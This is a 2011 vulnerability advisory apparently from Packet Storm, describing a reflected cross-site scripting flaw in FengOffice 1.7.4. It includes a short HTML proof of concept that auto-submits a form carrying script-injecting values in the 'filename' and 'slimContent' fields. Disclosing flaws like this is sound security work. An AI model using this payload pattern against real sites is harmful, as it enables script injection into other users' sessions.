FengOffice 1.7.4 Cross Site Scripting

2011-03-27T00:00:00
ID PACKETSTORM:99786
Type packetstorm
Reporter AutoSec Tools
Modified 2011-03-27T00:00:00

Description

                                        
                                            `<!------------------------------------------------------------------------  
# Software................FengOffice 1.7.4  
# Vulnerability...........Reflected Cross-site Scripting  
# Threat Level............Low (1/5)  
# Download................http://www.fengoffice.com  
# Vendor Contact Date.....3/11/2011  
# Disclosure Date.........3/25/2011  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................AutoSec Tools  
# Site....................http://www.autosectools.com/  
# Email...................John Leitch <john@autosectools.com>  
# ------------------------------------------------------------------------  
#   
#   
# --Description--  
#   
# A reflected cross-site scripting vulnerability in FengOffice 1.7.4 can  
# be exploited to execute arbitrary JavaScript.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://localhost/feng_community/public/assets/javascript/slimey/save.php">  
<input type="hidden" name="filename" value=""><script>alert(0)</script>" />  
<input type="hidden" name="slimContent" value="</textarea><script>alert(0)</script>" />   
</form>  
</body>  
</html>  
`